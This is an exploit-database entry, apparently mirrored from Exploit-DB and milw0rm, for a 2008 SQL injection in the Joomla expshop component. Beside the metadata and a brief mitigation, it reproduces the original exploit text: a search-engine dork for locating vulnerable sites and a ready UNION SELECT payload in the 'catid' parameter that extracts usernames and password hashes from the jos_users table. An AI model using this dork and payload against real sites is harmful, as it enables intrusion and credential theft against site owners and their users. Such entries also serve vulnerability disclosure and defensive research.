header-logo
Suggest Exploit
vendor:
expshop
by:
His0k4
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: expshop
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Joomla Component expshop Remote SQL injection

A vulnerability in Joomla Component expshop allows an attacker to inject arbitrary SQL commands via the 'catid' parameter in the 'show_payment' page. An attacker can exploit this vulnerability to gain access to the database and execute arbitrary commands.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Sanitize all user input to ensure that it conforms to the expected format, type, length, and range.
Source

Exploit-DB raw data:

/---------------------------------------------------------------\
\                                				/
/         Joomla Component expshop Remote SQL injection         \
\                                				/
\---------------------------------------------------------------/


[*] Author    :  His0k4 [ALGERIAN HaCkEr]

[*] Dork      :  inurl:com_expshop

[*] POC        : http://localhost/[Joomla_Path]/index.php?option=com_expshop&page=show_payment&catid={SQL}

[*] Example    : http://localhost/[Joomla_Path]/index.php?option=com_expshop&page=show_payment&catid=-2 UNION SELECT @@version,@@version,concat(username,0x3a,password) FROM jos_users--

                
----------------------------------------------------------------------------
[*] Greetings :  All friends & muslims HaCkeRs...
[*] Greetings2:  http://palcastle.org/cc

# milw0rm.com [2008-06-22]